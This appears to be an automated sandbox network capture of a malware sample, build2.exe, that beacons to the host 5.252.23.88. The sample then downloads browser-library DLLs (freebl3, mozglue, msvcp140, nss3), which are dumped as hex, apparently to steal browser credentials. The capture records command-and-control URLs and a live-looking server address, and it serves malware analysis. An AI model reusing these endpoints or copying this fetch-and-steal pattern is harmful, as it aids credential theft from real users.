Mar 29, 2022 06:51:35.923055887 CEST	1795	IN	HTTP/1.1 404 Not Found Date: Tue, 29 Mar 2022 04:50:44 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Content-Length: 216 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 69 6c 65 73 2f 31 2f 62 75 69 6c 64 33 2e 65 78 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /files/1/build3.exe was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.7	49793	5.252.23.88	80	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2022 06:51:49.650526047 CEST	1829	OUT	POST /517 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 5.252.23.88 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Mar 29, 2022 06:51:49.860838890 CEST	1830	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 64 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8e bd 6e 02 31 10 06 9f 86 c6 02 74 77 88 e6 5c 26 a9 52 24 52 a0 a3 59 7c 1b 70 fc 2b 7b 1d 0e 9e 3e a7 b5 25 8a c8 c5 ce 48 a3 4f ee d7 fd bf 37 ec bb f5 eb db d7 fb e1 e3 53 ae 1a ac 4e 52 dc c0 5a 24 b1 15 a3 18 be 81 ef 19 94 29 51 6c 69 a6 a7 44 7f 79 ca 4f 5c 44 85 09 5b 54 91 93 8a 1c 44 c8 f9 16 d2 c4 a3 50 e8 da ea 8a 5c 57 ac 73 e9 1e 29 70 6b f0 de 52 26 2e 99 38 b4 38 5d 30 71 e8 90 c0 41 36 f5 db 36 28 a3 ae a0 7d 55 4d 94 70 6e ec c1 2b 64 56 41 fb 33 e4 2a 4b f1 08 75 0b e7 30 95 cc 78 3c bc 6c 36 43 d7 2f 22 77 5d 27 29 15 94 2e fc 6a cc a3 2b 59 ab d1 c5 9d b4 de c8 3f 03 da 00 f8 6a 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d9en1tw\&R$RY\|p+{>%HO7SNRZ$)QliDyO\D[TDP\Ws)pkR&.88]0qA66(}UMpn+dVA3*Ku0x<l6C/"w]').j+Y?j0
Mar 29, 2022 06:51:49.862179995 CEST	1830	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:49.892261982 CEST	1832	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:49 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:49 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Mar 29, 2022 06:51:49.892309904 CEST	1833	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Mar 29, 2022 06:51:49.892350912 CEST	1834	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Mar 29, 2022 06:51:49.892390013 CEST	1836	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
Mar 29, 2022 06:51:49.892431974 CEST	1837	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Mar 29, 2022 06:51:49.892476082 CEST	1839	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Mar 29, 2022 06:51:49.892519951 CEST	1840	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Mar 29, 2022 06:51:49.892564058 CEST	1841	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Mar 29, 2022 06:51:49.892604113 CEST	1843	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Mar 29, 2022 06:51:49.892648935 CEST	1844	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Mar 29, 2022 06:51:49.922532082 CEST	1846	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Mar 29, 2022 06:51:50.867424011 CEST	2182	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:50.897937059 CEST	2183	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:50 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:50 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Mar 29, 2022 06:51:52.005944967 CEST	2337	OUT	GET /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:52.036314011 CEST	2338	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:52 GMT Content-Type: application/x-msdos-program Content-Length: 440120 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "6b738-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:52 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AV5=A;";;;;;;-;RichPEL8'Y"!P az@ACR,x8?4:f8(@P@@.textr `.data( @.idata6P @@.didat4p6@.rsrc8@@.reloc4:<<@B
Mar 29, 2022 06:51:53.135974884 CEST	2799	OUT	GET /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 5.252.23.88 Connection: Keep-Alive
Mar 29, 2022 06:51:53.166328907 CEST	2800	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Mar 2022 04:51:53 GMT Content-Type: application/x-msdos-program Content-Length: 1246160 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "1303d0-57aa1f0b0df80" Expires: Wed, 30 Mar 2022 04:51:53 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 